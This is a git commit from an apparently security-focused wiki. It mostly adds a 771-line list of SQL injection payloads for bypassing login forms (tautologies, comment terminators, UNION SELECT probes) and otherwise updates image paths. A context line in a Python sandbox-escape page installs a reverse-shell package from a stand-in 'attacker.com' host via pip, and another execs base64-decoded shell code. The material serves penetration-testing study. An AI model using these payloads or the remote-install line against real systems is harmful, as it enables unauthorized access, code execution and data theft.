GitBook: [#3128] No subject

This commit is contained in:
CPol 2022-04-27 12:34:57 +00:00 committed by gitbook-bot
parent 5b02745ee2
commit c012b524c7
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
101 changed files with 873 additions and 92 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 72 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 93 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 13 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 766 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 766 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 142 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 142 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 740 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 137 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 137 KiB

View file

@ -0,0 +1,771 @@
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
==
=
'
' --
' #
'
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
or 1=1
or true
' or ''='
" or ""="
1) and '1='1
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
and 1=1
and 1=1
' and 'one'='one
' and 'one'='one
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
or 0=0 --
or 0=0 #
or 0=0
' or 0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0
" or 0=0 --
" or 0=0 #
" or 0=0
%' or '0'='0
or 1=1
or 1=1--
or 1=1/*
or 1=1#
or 1=1
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1='1
' or 1=1
' or 1=1 --
' or 1=1
' or 1=1--
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1='1
) or ('1='1
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or 'a'='a
' or a=a--
' or a=a
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'x'='x
') or ('x'='x
" or "x"="x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
==
=
'
"
'-- 2
'/*
'#
"-- 2
" #
"/*
'-'
'&'
'^'
'*'
'='
0'<'2
"-"
"&"
"^"
"*"
"="
0"<"2
')
")
')-- 2
')/*
')#
")-- 2
") #
")/*
')-('
')&('
')^('
')*('
')=('
0')<('2
")-("
")&("
")^("
")*("
")=("
0")<("2
'-''-- 2
'-''#
'-''/*
'&''-- 2
'&''#
'&''/*
'^''-- 2
'^''#
'^''/*
'*''-- 2
'*''#
'*''/*
'=''-- 2
'=''#
'=''/*
0'<'2'-- 2
0'<'2'#
0'<'2'/*
"-""-- 2
"-""#
"-""/*
"&""-- 2
"&""#
"&""/*
"^""-- 2
"^""#
"^""/*
"*""-- 2
"*""#
"*""/*
"=""-- 2
"=""#
"=""/*
0"<"2"-- 2
0"<"2"#
0"<"2"/*
')-''-- 2
')-''#
')-''/*
')&''-- 2
')&''#
')&''/*
')^''-- 2
')^''#
')^''/*
')*''-- 2
')*''#
')*''/*
')=''-- 2
')=''#
')=''/*
0')<'2'-- 2
0')<'2'#
0')<'2'/*
")-""-- 2
")-""#
")-""/*
")&""-- 2
")&""#
")&""/*
")^""-- 2
")^""#
")^""/*
")*""-- 2
")*""#
")*""/*
")=""-- 2
")=""#
")=""/*
0")<"2-- 2
0")<"2#
0")<"2/*
'oR'2
'oR'2'-- 2
'oR'2'#
'oR'2'/*
'oR'2'oR'
'oR(2)-- 2
'oR(2)#
'oR(2)/*
'oR(2)oR'
'oR 2-- 2
'oR 2#
'oR 2/*
'oR 2 oR'
'oR/**/2-- 2
'oR/**/2#
'oR/**/2/*
'oR/**/2/**/oR'
"oR"2
"oR"2"-- 2
"oR"2"#
"oR"2"/*
"oR"2"oR"
"oR(2)-- 2
"oR(2)#
"oR(2)/*
"oR(2)oR"
"oR 2-- 2
"oR 2#
"oR 2/*
"oR 2 oR"
"oR/**/2-- 2
"oR/**/2#
"oR/**/2/*
"oR/**/2/**/oR"
'oR'2'='2
'oR'2'='2'oR'
'oR'2'='2'-- 2
'oR'2'='2'#
'oR'2'='2'/*
'oR'2'='2'oR'
'oR 2=2-- 2
'oR 2=2#
'oR 2=2/*
'oR 2=2 oR'
'oR/**/2=2-- 2
'oR/**/2=2#
'oR/**/2=2/*
'oR/**/2=2/**/oR'
'oR(2)=2-- 2
'oR(2)=2#
'oR(2)=2/*
'oR(2)=2/*
'oR(2)=(2)oR'
'oR'2'='2' LimIT 1-- 2
'oR'2'='2' LimIT 1#
'oR'2'='2' LimIT 1/*
'oR(2)=(2)LimIT(1)-- 2
'oR(2)=(2)LimIT(1)#
'oR(2)=(2)LimIT(1)/*
"oR"2"="2
"oR"2"="2"oR"
"oR"2"="2"-- 2
"oR"2"="2"#
"oR"2"="2"/*
"oR"2"="2"oR"
"oR 2=2-- 2
"oR 2=2#
"oR 2=2/*
"oR 2=2 oR"
"oR/**/2=2-- 2
"oR/**/2=2#
"oR/**/2=2/*
"oR/**/2=2/**/oR"
"oR(2)=2-- 2
"oR(2)=2#
"oR(2)=2/*
"oR(2)=2/*
"oR(2)=(2)oR"
"oR"2"="2" LimIT 1-- 2
"oR"2"="2" LimIT 1#
"oR"2"="2" LimIT 1/*
"oR(2)=(2)LimIT(1)-- 2
"oR(2)=(2)LimIT(1)#
"oR(2)=(2)LimIT(1)/*
'oR true-- 2
'oR true#
'oR true/*
'oR true oR'
'oR(true)-- 2
'oR(true)#
'oR(true)/*
'oR(true)oR'
'oR/**/true-- 2
'oR/**/true#
'oR/**/true/*
'oR/**/true/**/oR'
"oR true-- 2
"oR true#
"oR true/*
"oR true oR"
"oR(true)-- 2
"oR(true)#
"oR(true)/*
"oR(true)oR"
"oR/**/true-- 2
"oR/**/true#
"oR/**/true/*
"oR/**/true/**/oR"
'oR'2'LiKE'2
'oR'2'LiKE'2'-- 2
'oR'2'LiKE'2'#
'oR'2'LiKE'2'/*
'oR'2'LiKE'2'oR'
'oR(2)LiKE(2)-- 2
'oR(2)LiKE(2)#
'oR(2)LiKE(2)/*
'oR(2)LiKE(2)oR'
"oR"2"LiKE"2
"oR"2"LiKE"2"-- 2
"oR"2"LiKE"2"#
"oR"2"LiKE"2"/*
"oR"2"LiKE"2"oR"
"oR(2)LiKE(2)-- 2
"oR(2)LiKE(2)#
"oR(2)LiKE(2)/*
"oR(2)LiKE(2)oR"
admin
admin'-- 2
admin'#
admin'/*
admin"-- 2
admin"#
ffifdyop
' UniON SElecT 1,2-- 2
' UniON SElecT 1,2,3-- 2
' UniON SElecT 1,2,3,4-- 2
' UniON SElecT 1,2,3,4,5-- 2
' UniON SElecT 1,2#
' UniON SElecT 1,2,3#
' UniON SElecT 1,2,3,4#
' UniON SElecT 1,2,3,4,5#
'UniON(SElecT(1),2)-- 2
'UniON(SElecT(1),2,3)-- 2
'UniON(SElecT(1),2,3,4)-- 2
'UniON(SElecT(1),2,3,4,5)-- 2
'UniON(SElecT(1),2)#
'UniON(SElecT(1),2,3)#
'UniON(SElecT(1),2,3,4)#
'UniON(SElecT(1),2,3,4,5)#
" UniON SElecT 1,2-- 2
" UniON SElecT 1,2,3-- 2
" UniON SElecT 1,2,3,4-- 2
" UniON SElecT 1,2,3,4,5-- 2
" UniON SElecT 1,2#
" UniON SElecT 1,2,3#
" UniON SElecT 1,2,3,4#
" UniON SElecT 1,2,3,4,5#
"UniON(SElecT(1),2)-- 2
"UniON(SElecT(1),2,3)-- 2
"UniON(SElecT(1),2,3,4)-- 2
"UniON(SElecT(1),2,3,4,5)-- 2
"UniON(SElecT(1),2)#
"UniON(SElecT(1),2,3)#
"UniON(SElecT(1),2,3,4)#
"UniON(SElecT(1),2,3,4,5)#
'||'2
'||2-- 2
'||'2'||'
'||2#
'||2/*
'||2||'
"||"2
"||2-- 2
"||"2"||"
"||2#
"||2/*
"||2||"
'||'2'='2
'||'2'='2'||'
'||2=2-- 2
'||2=2#
'||2=2/*
'||2=2||'
"||"2"="2
"||"2"="2"||"
"||2=2-- 2
"||2=2#
"||2=2/*
"||2=2||"
'||2=(2)LimIT(1)-- 2
'||2=(2)LimIT(1)#
'||2=(2)LimIT(1)/*
"||2=(2)LimIT(1)-- 2
"||2=(2)LimIT(1)#
"||2=(2)LimIT(1)/*
'||true-- 2
'||true#
'||true/*
'||true||'
"||true-- 2
"||true#
"||true/*
"||true||"
'||'2'LiKE'2
'||'2'LiKE'2'-- 2
'||'2'LiKE'2'#
'||'2'LiKE'2'/*
'||'2'LiKE'2'||'
'||(2)LiKE(2)-- 2
'||(2)LiKE(2)#
'||(2)LiKE(2)/*
'||(2)LiKE(2)||'
"||"2"LiKE"2
"||"2"LiKE"2"-- 2
"||"2"LiKE"2"#
"||"2"LiKE"2"/*
"||"2"LiKE"2"||"
"||(2)LiKE(2)-- 2
"||(2)LiKE(2)#
"||(2)LiKE(2)/*
"||(2)LiKE(2)||"
')oR('2
')oR'2'-- 2
')oR'2'#
')oR'2'/*
')oR'2'oR('
')oR(2)-- 2
')oR(2)#
')oR(2)/*
')oR(2)oR('
')oR 2-- 2
')oR 2#
')oR 2/*
')oR 2 oR('
')oR/**/2-- 2
')oR/**/2#
')oR/**/2/*
')oR/**/2/**/oR('
")oR("2
")oR"2"-- 2
")oR"2"#
")oR"2"/*
")oR"2"oR("
")oR(2)-- 2
")oR(2)#
")oR(2)/*
")oR(2)oR("
")oR 2-- 2
")oR 2#
")oR 2/*
")oR 2 oR("
")oR/**/2-- 2
")oR/**/2#
")oR/**/2/*
")oR/**/2/**/oR("
')oR'2'=('2
')oR'2'='2'oR('
')oR'2'='2'-- 2
')oR'2'='2'#
')oR'2'='2'/*
')oR'2'='2'oR('
')oR 2=2-- 2
')oR 2=2#
')oR 2=2/*
')oR 2=2 oR('
')oR/**/2=2-- 2
')oR/**/2=2#
')oR/**/2=2/*
')oR/**/2=2/**/oR('
')oR(2)=2-- 2
')oR(2)=2#
')oR(2)=2/*
')oR(2)=2/*
')oR(2)=(2)oR('
')oR'2'='2' LimIT 1-- 2
')oR'2'='2' LimIT 1#
')oR'2'='2' LimIT 1/*
')oR(2)=(2)LimIT(1)-- 2
')oR(2)=(2)LimIT(1)#
')oR(2)=(2)LimIT(1)/*
")oR"2"=("2
")oR"2"="2"oR("
")oR"2"="2"-- 2
")oR"2"="2"#
")oR"2"="2"/*
")oR"2"="2"oR("
")oR 2=2-- 2
")oR 2=2#
")oR 2=2/*
")oR 2=2 oR("
")oR/**/2=2-- 2
")oR/**/2=2#
")oR/**/2=2/*
")oR/**/2=2/**/oR("
")oR(2)=2-- 2
")oR(2)=2#
")oR(2)=2/*
")oR(2)=2/*
")oR(2)=(2)oR("
")oR"2"="2" LimIT 1-- 2
")oR"2"="2" LimIT 1#
")oR"2"="2" LimIT 1/*
")oR(2)=(2)LimIT(1)-- 2
")oR(2)=(2)LimIT(1)#
")oR(2)=(2)LimIT(1)/*
')oR true-- 2
')oR true#
')oR true/*
')oR true oR('
')oR(true)-- 2
')oR(true)#
')oR(true)/*
')oR(true)oR('
')oR/**/true-- 2
')oR/**/true#
')oR/**/true/*
')oR/**/true/**/oR('
")oR true-- 2
")oR true#
")oR true/*
")oR true oR("
")oR(true)-- 2
")oR(true)#
")oR(true)/*
")oR(true)oR("
")oR/**/true-- 2
")oR/**/true#
")oR/**/true/*
")oR/**/true/**/oR("
')oR'2'LiKE('2
')oR'2'LiKE'2'-- 2
')oR'2'LiKE'2'#
')oR'2'LiKE'2'/*
')oR'2'LiKE'2'oR('
')oR(2)LiKE(2)-- 2
')oR(2)LiKE(2)#
')oR(2)LiKE(2)/*
')oR(2)LiKE(2)oR('
")oR"2"LiKE("2
")oR"2"LiKE"2"-- 2
")oR"2"LiKE"2"#
")oR"2"LiKE"2"/*
")oR"2"LiKE"2"oR("
")oR(2)LiKE(2)-- 2
")oR(2)LiKE(2)#
")oR(2)LiKE(2)/*
")oR(2)LiKE(2)oR("
admin')-- 2
admin')#
admin')/*
admin")-- 2
admin")#
') UniON SElecT 1,2-- 2
') UniON SElecT 1,2,3-- 2
') UniON SElecT 1,2,3,4-- 2
') UniON SElecT 1,2,3,4,5-- 2
') UniON SElecT 1,2#
') UniON SElecT 1,2,3#
') UniON SElecT 1,2,3,4#
') UniON SElecT 1,2,3,4,5#
')UniON(SElecT(1),2)-- 2
')UniON(SElecT(1),2,3)-- 2
')UniON(SElecT(1),2,3,4)-- 2
')UniON(SElecT(1),2,3,4,5)-- 2
')UniON(SElecT(1),2)#
')UniON(SElecT(1),2,3)#
')UniON(SElecT(1),2,3,4)#
')UniON(SElecT(1),2,3,4,5)#
") UniON SElecT 1,2-- 2
") UniON SElecT 1,2,3-- 2
") UniON SElecT 1,2,3,4-- 2
") UniON SElecT 1,2,3,4,5-- 2
") UniON SElecT 1,2#
") UniON SElecT 1,2,3#
") UniON SElecT 1,2,3,4#
") UniON SElecT 1,2,3,4,5#
")UniON(SElecT(1),2)-- 2
")UniON(SElecT(1),2,3)-- 2
")UniON(SElecT(1),2,3,4)-- 2
")UniON(SElecT(1),2,3,4,5)-- 2
")UniON(SElecT(1),2)#
")UniON(SElecT(1),2,3)#
")UniON(SElecT(1),2,3,4)#
")UniON(SElecT(1),2,3,4,5)#
')||('2
')||2-- 2
')||'2'||('
')||2#
')||2/*
')||2||('
")||("2
")||2-- 2
")||"2"||("
")||2#
")||2/*
")||2||("
')||'2'=('2
')||'2'='2'||('
')||2=2-- 2
')||2=2#
')||2=2/*
')||2=2||('
")||"2"=("2
")||"2"="2"||("
")||2=2-- 2
")||2=2#
")||2=2/*
")||2=2||("
')||2=(2)LimIT(1)-- 2
')||2=(2)LimIT(1)#
')||2=(2)LimIT(1)/*
")||2=(2)LimIT(1)-- 2
")||2=(2)LimIT(1)#
")||2=(2)LimIT(1)/*
')||true-- 2
')||true#
')||true/*
')||true||('
")||true-- 2
")||true#
")||true/*
")||true||("
')||'2'LiKE('2
')||'2'LiKE'2'-- 2
')||'2'LiKE'2'#
')||'2'LiKE'2'/*
')||'2'LiKE'2'||('
')||(2)LiKE(2)-- 2
')||(2)LiKE(2)#
')||(2)LiKE(2)/*
')||(2)LiKE(2)||('
")||"2"LiKE("2
")||"2"LiKE"2"-- 2
")||"2"LiKE"2"#
")||"2"LiKE"2"/*
")||"2"LiKE"2"||("
")||(2)LiKE(2)-- 2
")||(2)LiKE(2)#
")||(2)LiKE(2)/*
")||(2)LiKE(2)||("
' UnION SELeCT 1,2`
' UnION SELeCT 1,2,3`
' UnION SELeCT 1,2,3,4`
' UnION SELeCT 1,2,3,4,5`
" UnION SELeCT 1,2`
" UnION SELeCT 1,2,3`
" UnION SELeCT 1,2,3,4`
" UnION SELeCT 1,2,3,4,5`

View file

@ -10,7 +10,7 @@ dht udp "DHT Nodes"
![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>)
InfluxDB

View file

@ -42,7 +42,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [**INE**](https://ine.com)
![](<.gitbook/assets/INE\_Logo (3).jpg>)
![](.gitbook/assets/ine\_logo-3-.jpg)
[**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.**

View file

@ -287,7 +287,7 @@ Moreover, if you don't have configured in the **branch protection** to ask to **
This is the **setting** in Github branch protections:
![](<../.gitbook/assets/image (307).png>)
![](<../.gitbook/assets/image (375) (1).png>)
### Webhook Secret

View file

@ -2,7 +2,7 @@
## Architecture
![](<../../.gitbook/assets/image (307) (3) (1).png>)
![](<../../.gitbook/assets/image (651) (1).png>)
### ATC: web UI & build scheduler

View file

@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
![](<../../.gitbook/assets/image (618).png>)
![](<../../.gitbook/assets/image (628) (1) (1) (1).png>)
The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:

View file

@ -8,7 +8,7 @@ This machine was categorised as easy and it was pretty easy.
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
![](<../../.gitbook/assets/image (79) (1).png>)
![](<../../.gitbook/assets/image (79) (2).png>)
In as you can see 2 ports are open: 80 (**HTTP**) and 22 (**SSH**)

View file

@ -387,7 +387,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
![](<../../.gitbook/assets/image (620).png>)
![](<../../.gitbook/assets/image (620) (1) (1).png>)
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
@ -456,7 +456,7 @@ For example, in the following situation there is a **local variable in the stack
So, flag is in **0xffffcf4c**
![](<../../.gitbook/assets/image (622).png>)
![](<../../.gitbook/assets/image (618) (2).png>)
And from the leak you can see the **pointer to the flag** is in the **8th** parameter:

View file

@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (2).png>)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (2).png>)
An then use the following code

View file

@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
![](<../../../.gitbook/assets/image (507) (1).png>)
![](<../../../.gitbook/assets/image (507) (1) (1).png>)
![](<../../../.gitbook/assets/image (509).png>)

View file

@ -60,7 +60,7 @@ This tool is also useful to get **other information analysed** from the packets
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
![](<../../../.gitbook/assets/image (567) (1) (1).png>)
![](<../../../.gitbook/assets/image (567) (1).png>)
### [BruteShark](https://github.com/odedshimon/BruteShark)

View file

@ -83,7 +83,7 @@ You can add a column that show the Host HTTP header:
And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
![](<../../../.gitbook/assets/image (408) (1).png>)
![](<../../../.gitbook/assets/image (408).png>)
## Identifying local hostnames

View file

@ -36,7 +36,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
![](<../../../.gitbook/assets/image (495) (1) (1).png>)
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
### Volume Shadow Copies
@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png>)
### USB Detective

View file

@ -133,7 +133,7 @@ Within this registry it's possible to find:
![](<../../../.gitbook/assets/image (477).png>)
![](<../../../.gitbook/assets/image (479) (1) (1).png>)
![](<../../../.gitbook/assets/image (479) (1).png>)
Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value
@ -153,7 +153,7 @@ Having the **{GUID}** of the device it's now possible to **check all the NTUDER.
Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one (using the tool Registry Explorer).
![](<../../../.gitbook/assets/image (483) (1).png>)
![](<../../../.gitbook/assets/image (483) (1) (1).png>)
### Volume Serial Number

View file

@ -941,7 +941,7 @@ int main(int argc,char* argv[] )
I exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command:
{% endhint %}
![](<../../.gitbook/assets/image (407) (2).png>)
![](<../../.gitbook/assets/image (407) (1).png>)
**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)

View file

@ -193,7 +193,7 @@ The offsets of any constructors are held in the **\_\_mod\_init\_func** section
The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type.
![](<../../.gitbook/assets/image (555).png>)
![](<../../.gitbook/assets/image (507) (3).png>)
#### Get the info

View file

@ -108,7 +108,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi
2. The JSON payload is encrypted using Absinthe (**`NACSign`**)
3. All requests over HTTPs, built-in root certificates are used
![](<../../../.gitbook/assets/image (566) (1).png>)
![](<../../../.gitbook/assets/image (566).png>)
The response is a JSON dictionary with some important data like:
@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>)
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>)
### Step 6: Profile Installation

View file

@ -85,7 +85,7 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
{% file src="../../../.gitbook/assets/Reverse.tar.gz" %}
{% file src="../../../.gitbook/assets/reverse.tar.gz" %}
{% hint style="info" %}
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
@ -121,7 +121,7 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
* [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
If you can access to the**`__builtins__`** object you can import libraries (notice that you could also use here other string representation showed in last section):
If you can access to the\*\*`__builtins__`\*\* object you can import libraries (notice that you could also use here other string representation showed in last section):
```python
__builtins__.__import__("os").system("ls")
@ -751,6 +751,7 @@ First of all, we need to know **how to create and execute a code object** so we
```python
code_type = type((lambda: None).__code__)
# Check the following hint if you get an error in calling this
code_obj = code_type(co_argcount, co_kwonlyargcount,
co_nlocals, co_stacksize, co_flags,
co_code, co_consts, co_names,
@ -767,6 +768,16 @@ mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
```
{% hint style="info" %}
Depending on the python version the **parameters** of `code_type` may have a **different order**. The best way to know the order of the params in the python version you are running is to run:
```
import types
types.CodeType.__doc__
'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n flags, codestring, constants, names, varnames, filename, name,\n firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object. Not for the faint of heart.'
```
{% endhint %}
### Recreating a leaked function
{% hint style="warning" %}

View file

@ -3,8 +3,7 @@
{% hint style="warning" %}
**Support HackTricks and get benefits!**
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
@ -28,7 +27,7 @@ It's highly recommended to start reading this page to know about the **most impo
This is the main tool you need to connect to an android device (emulated or physical).\
It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more.
Take a look to the following list of [**ADB Commands**](adb-commands.md) \_**\_to learn how to use adb.
Take a look to the following list of [**ADB Commands**](adb-commands.md) \_\*\*\_to learn how to use adb.
## Smali
@ -307,7 +306,7 @@ Drozer is s useful tool to **exploit exported activities, exported services and
### Exploiting exported Activities
[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
\_**\_Also remember that the code of an activity starts with the `onCreate` method.
\_\*\*\_Also remember that the code of an activity starts with the `onCreate` method.
#### Authorisation bypass
@ -342,7 +341,7 @@ Content providers are basically used to **share data**. If an app has available
### **Exploiting Services**
[**Read this if you want to remind what is a Service.**](android-applications-basics.md#services)\
\_**\_Remember that a the actions of a Service start in the method `onStartCommand`.
\_\*\*\_Remember that a the actions of a Service start in the method `onStartCommand`.
As service is basically something that **can receive data**, **process** it and **returns** (or not) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...\
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services)
@ -350,7 +349,7 @@ As service is basically something that **can receive data**, **process** it and
### **Exploiting Broadcast Receivers**
[**Read this if you want to remind what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
\_**\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`.
\_\*\*\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`.
